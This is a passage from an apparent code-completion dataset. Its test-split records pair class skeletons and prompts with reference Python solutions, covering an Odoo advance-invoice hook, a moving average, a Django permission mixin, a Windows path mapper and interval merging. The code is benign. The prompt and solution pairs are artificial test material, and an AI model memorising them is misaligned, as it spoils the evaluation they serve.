journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n<|end_body_2|>\n", "revision_id": "b57f714b83d55110003998c7ad276e5076c7ecd8", "skeleton": "<|skeleton|>\nclass AccountPayment:\n\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n <|body_0|>\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n <|body_1|>\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccountPayment:\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and 
self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n", "source": "the_stack_v2_python_sparse", "source_path": "l10n_mx_edi_advance/models/account_payment.py", "source_repo": "tate11/quemendev", "split": "test", "star_events_count": 0} {"blob_id": "6729dc202743738c0a7e77cfabd18ed7dc3727c2", "bodies": ["self.array = [None for _ in range(size)]\nself.i = 0\nself.total = 0", "if self.array[self.i] is not None:\n self.total -= self.array[self.i]\nself.total += val\nself.array[self.i] = val\nself.i = (self.i + 1) % len(self.array)\ncount = len(self.array)\nif self.array[-1] is None:\n count = self.i\nreturn self.total / float(count)"], "bodies_text": "<|body_start_0|>\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n 
self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MovingAverage", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MovingAverage:\n\n def __init__(self, size):\n \"\"\"Initialize your data structure here. :type size: int\"\"\"\n <|body_0|>\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000168", "length_bytes": 1359, "license_type": "no_license", "methods": [{"docstring": "Initialize your data structure here. :type size: int", "name": "__init__", "signature": "def __init__(self, size)"}, {"docstring": ":type val: int :rtype: float", "name": "next", "signature": "def next(self, val)"}], "n_methods": 2, "prompt": "Implement the Python class `MovingAverage` described below.\n\nClass description:\nImplement the MovingAverage class.\n\nMethod signatures and docstrings:\n- def __init__(self, size): Initialize your data structure here. :type size: int\n- def next(self, val): :type val: int :rtype: float", "prompted_full_text": "Implement the Python class `MovingAverage` described below.\n\nClass description:\nImplement the MovingAverage class.\n\nMethod signatures and docstrings:\n- def __init__(self, size): Initialize your data structure here. :type size: int\n- def next(self, val): :type val: int :rtype: float\n\n<|skeleton|>\nclass MovingAverage:\n\n def __init__(self, size):\n \"\"\"Initialize your data structure here. :type size: int\"\"\"\n <|body_0|>\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n<|end_body_1|>\n", "revision_id": "05e0beff0047f0ad399d0b46d625bb8d3459814e", "skeleton": "<|skeleton|>\nclass MovingAverage:\n\n def __init__(self, size):\n \"\"\"Initialize your data structure here. :type size: int\"\"\"\n <|body_0|>\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MovingAverage:\n def __init__(self, size):\n \"\"\"Initialize your data structure here. 
:type size: int\"\"\"\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n", "source": "the_stack_v2_python_sparse", "source_path": "python_1_to_1000/346_Moving_Average_from_Data_Stream.py", "source_repo": "jakehoare/leetcode", "split": "test", "star_events_count": 58} {"blob_id": "cd1dcc7943b5b0910611c7826539ded39b3590c2", "bodies": ["if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\nif not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\nself.object = self.get_object()\nif isinstance(self.object, Card):\n card = self.object\nelse:\n card = self.object.card\nif not self.request.user.is_authenticated:\n return card.public\nelse:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()", "if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\ntry:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\nexcept:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\nraise PermissionDenied"], "bodies_text": "<|body_start_0|>\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RevisionPermissionMixin", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RevisionPermissionMixin:\n\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n <|body_0|>\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if 
not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000169", "length_bytes": 26085, "license_type": "permissive", "methods": [{"docstring": "Check if trial period is over and if user is allowed to access requested object.", "name": "test_func", "signature": "def test_func(self)"}, {"docstring": "Ask user to login or to subscribe to a cards plan.", "name": "handle_no_permission", "signature": "def handle_no_permission(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002956", "prompt": "Implement the Python class `RevisionPermissionMixin` described below.\n\nClass description:\nImplement the RevisionPermissionMixin class.\n\nMethod signatures and docstrings:\n- def test_func(self): Check if trial period is over and if user is allowed to access requested object.\n- def handle_no_permission(self): Ask user to login or to subscribe to a cards plan.", "prompted_full_text": "Implement the Python class `RevisionPermissionMixin` described below.\n\nClass description:\nImplement the RevisionPermissionMixin class.\n\nMethod signatures and docstrings:\n- def test_func(self): Check if trial period is over and if user is allowed to access requested object.\n- def handle_no_permission(self): Ask user to login or to subscribe to a cards plan.\n\n<|skeleton|>\nclass RevisionPermissionMixin:\n\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n <|body_0|>\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n<|end_body_1|>\n", "revision_id": 
"461de3ba011c0aaed3f0014136c4497b6890d086", "skeleton": "<|skeleton|>\nclass RevisionPermissionMixin:\n\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n <|body_0|>\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RevisionPermissionMixin:\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n", "source": "the_stack_v2_python_sparse", "source_path": "blousebrothers/cards/views.py", "source_repo": "sladinji/blousebrothers", "split": "test", "star_events_count": 1} {"blob_id": "378233ad859a5b8468c17383613d4d7207e7f60c", "bodies": ["if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass", "match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\nif not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\nif not match.group(1) in self._MAPPING:\n return None\ndrive = self._MAPPING[match.group(1)]\nif not drive or not match.group(2):\n return drive\nreturn drive + match.group(2)"], "bodies_text": "<|body_start_0|>\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. 
Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n<|end_body_0|>\n\n<|body_start_1|>\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n<|end_body_1|>\n", "class_docstring": "Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.", "class_name": "DosDriveMap", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n <|body_0|>\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n<|end_body_0|>\n\n<|body_start_1|>\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000170", "length_bytes": 42355, "license_type": "permissive", "methods": [{"docstring": "Lazy loads the cache.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Converts a native NT path to Win32/DOS compatible path.", "name": "to_win32", "signature": "def to_win32(self, path)"}], "n_methods": 2, "prompt": "Implement the Python class `DosDriveMap` described below.\n\nClass description:\nMaps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\n\nMethod signatures and docstrings:\n- def __init__(self): Lazy loads the cache.\n- def to_win32(self, path): Converts a native NT path to Win32/DOS compatible path.", "prompted_full_text": "Implement the Python class `DosDriveMap` described below.\n\nClass description:\nMaps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\n\nMethod signatures and docstrings:\n- def __init__(self): Lazy loads the cache.\n- def to_win32(self, path): Converts a native NT path to Win32/DOS compatible path.\n\n<|skeleton|>\nclass DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n 
<|body_0|>\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n<|end_body_0|>\n\n<|body_start_1|>\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n<|end_body_1|>\n", "revision_id": "10cc5fdcca53e2a1690867acbe6fce099273f092", "skeleton": "<|skeleton|>\nclass DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n <|body_0|>\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. 
Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n", "source": "the_stack_v2_python_sparse", "source_path": "client/utils/file_path.py", "source_repo": "luci/luci-py", "split": "test", "star_events_count": 84} {"blob_id": "5fa3f76a150a38cf2edcbc3ad7e01e5d68dedc0f", "bodies": ["n = len(intervals)\nif n <= 1:\n return intervals\nintervals = sorted(intervals, key=lambda x: x[0])\nstack = []\nfor i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\nreturn stack", "n = len(intervals)\nif n <= 1:\n return intervals\nintervals = sorted(intervals, key=lambda x: x[1])\nstack = []\nfor i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\nreturn stack"], "bodies_text": "<|body_start_0|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_0|>\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n 
stack.append([start, intervals[i][1]])\n return stack\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000171", "length_bytes": 1868, "license_type": "no_license", "methods": [{"docstring": ":type intervals: List[List[int]] :rtype: List[List[int]]", "name": "merge", "signature": "def merge(self, intervals)"}, {"docstring": ":type intervals: List[List[int]] :rtype: List[List[int]]", "name": "merge0", "signature": "def merge0(self, intervals)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def merge(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]\n- def merge0(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def merge(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]\n- def merge0(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]\n\n<|skeleton|>\nclass Solution:\n\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_0|>\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_1|>\n", "revision_id": "6e18c5d257840489cc3fb1079ae3804c743982a4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_0|>\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: 